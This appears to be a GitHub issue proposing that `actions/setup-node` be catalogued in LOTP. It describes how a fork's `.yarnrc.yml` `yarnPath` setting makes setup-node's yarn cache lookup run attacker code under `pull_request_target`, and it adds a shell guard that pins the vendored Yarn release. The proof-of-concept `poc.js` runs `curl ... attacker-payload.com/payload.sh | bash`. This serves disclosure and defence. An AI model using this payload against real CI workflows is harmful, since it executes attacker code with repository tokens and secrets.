[LOTP] Add `actions/setup-node`
Description of the LOTP tool
`actions/setup-node` is used to set up a Node.js environment. It supports a `cache` input which runs the package manager (npm, yarn or pnpm) under the hood to locate its cache directory so that dependencies can be cached between runs. For `cache: yarn` that means invoking `yarn` (for example `yarn --version`, then `yarn cache dir` or `yarn config get cacheFolder`) inside the checked-out repository, before any project code has been looked at.
I haven't fully analyzed this, but have validated the yarn case on a disclosure that is currently in progress.
If an attacker sees a workflow that checks out PR code under a privileged trigger such as `pull_request_target` and then runs the following step:

```yaml
- name: Use Node.js 20
  uses: actions/setup-node@v4
  with:
    node-version: '20'
    cache: yarn
```
Then they can simply set the `yarnPath` config field in the `.yarnrc.yml` file in their fork and point it to a JavaScript payload file. The `yarn` launcher honours `yarnPath` on every invocation, including the `yarn --version` that setup-node runs first, so the payload executes with whatever token and secrets the workflow has before any build step runs. `.yarnrc.yml` in the fork:

```yaml
# .yarnrc.yml committed to the attacker's fork
yarnPath: "./poc.js"
```

and `poc.js`, the file it points at:
```javascript
// poc.js: run by the yarn launcher in place of a real Yarn release
const { exec } = require('child_process');

// Execute the bash command: fetch and run a second-stage script from the attacker's host
exec('bash -c "curl -sSfL attacker-payload.com/payload.sh | bash"', (error, stdout, stderr) => {
  if (error) {
    console.error(`Error: ${error.message}`);
    return;
  }
  if (stderr) {
    console.error(`stderr: ${stderr}`);
    return;
  }
  // Output the result
  console.log(`stdout: ${stdout}`);
});
```
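A guard a maintainer can drop into such a workflow, as an added example that is not part of LOTP, Yarn or `actions/setup-node`: it runs before `actions/setup-node`, reads `yarnPath` out of the checked-out `.yarnrc.yml`, and fails the job unless the value is unset or points at a file under `.yarn/releases/` whose sha256 matches a digest pinned in the workflow. The function names (`yarnrc_yarn_path`, `check_yarn_path`, `sha256_of`) and the pinned digest are this example's own assumptions. It only covers the `yarnPath` vector described above; the robust fix remains not running package-manager commands against an untrusted checkout under a privileged trigger.

```shell
#!/bin/sh
# Added example, not part of LOTP or actions/setup-node: a guard step to run
# BEFORE actions/setup-node (i.e. before anything invokes `yarn`) in a workflow
# that checks out untrusted PR code. It refuses to continue unless `yarnPath`
# in .yarnrc.yml is either unset or points at a file under .yarn/releases/
# whose sha256 matches a digest pinned in the workflow.
# Function and variable names here are the example's own, not setup-node's.

# sha256_of FILE -> hex digest (sha256sum on Linux, shasum on macOS)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# yarnrc_yarn_path RCFILE -> the top-level yarnPath value, or nothing if unset.
# Accepts bare, "double-quoted" and 'single-quoted' values and strips a trailing
# YAML comment; yarnPath is a plain top-level scalar, so no YAML parser is needed.
yarnrc_yarn_path() {
  [ -f "$1" ] || return 0
  sed -n 's/^yarnPath:[[:space:]]*//p' "$1" | head -n 1 \
    | sed -e 's/[[:space:]]#.*$//' -e 's/[[:space:]]*$//' \
          -e 's/^"\(.*\)"$/\1/' -e "s/^'\(.*\)'\$/\1/"
}

# check_yarn_path REPO_DIR PINNED_SHA256 -> 0 if the checkout is safe to hand
# to setup-node, 1 (with a reason on stderr) if yarn must not be invoked.
check_yarn_path() {
  repo=$1
  pinned=$2
  path=$(yarnrc_yarn_path "$repo/.yarnrc.yml")

  # No yarnPath: the launcher runs its own bundled Yarn, nothing from the tree.
  [ -n "$path" ] || return 0

  # Only the conventional vendored location is acceptable, and no traversal.
  case "$path" in
    *..*) echo "refusing: yarnPath '$path' contains '..'" >&2; return 1 ;;
    ./.yarn/releases/*|.yarn/releases/*) ;;
    *) echo "refusing: yarnPath '$path' is outside .yarn/releases/" >&2; return 1 ;;
  esac

  target="$repo/$path"
  if [ ! -f "$target" ]; then
    echo "refusing: yarnPath target '$path' does not exist" >&2
    return 1
  fi

  # A PR can replace the vendored release itself, so pin its digest, not its name.
  actual=$(sha256_of "$target")
  if [ "$actual" != "$pinned" ]; then
    echo "refusing: $path sha256 $actual != pinned $pinned" >&2
    return 1
  fi
  return 0
}

# Stand-alone usage: sh yarnpath-guard.sh <checkout-dir> <pinned-sha256>
if [ $# -eq 2 ]; then
  check_yarn_path "$1" "$2"
  exit $?
fi
```

Invoke it as a `run:` step placed before the `actions/setup-node` step (and before any other step that might call `yarn`), passing the checkout directory and the digest of the release the repository vendors; a mismatch fails the job before the launcher ever executes the PR's `yarnPath` target.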
Configuration files
.yarnrc.yml
Documentation
https://yarnpkg.com/configuration/yarnrc
Real-world example
Pending :)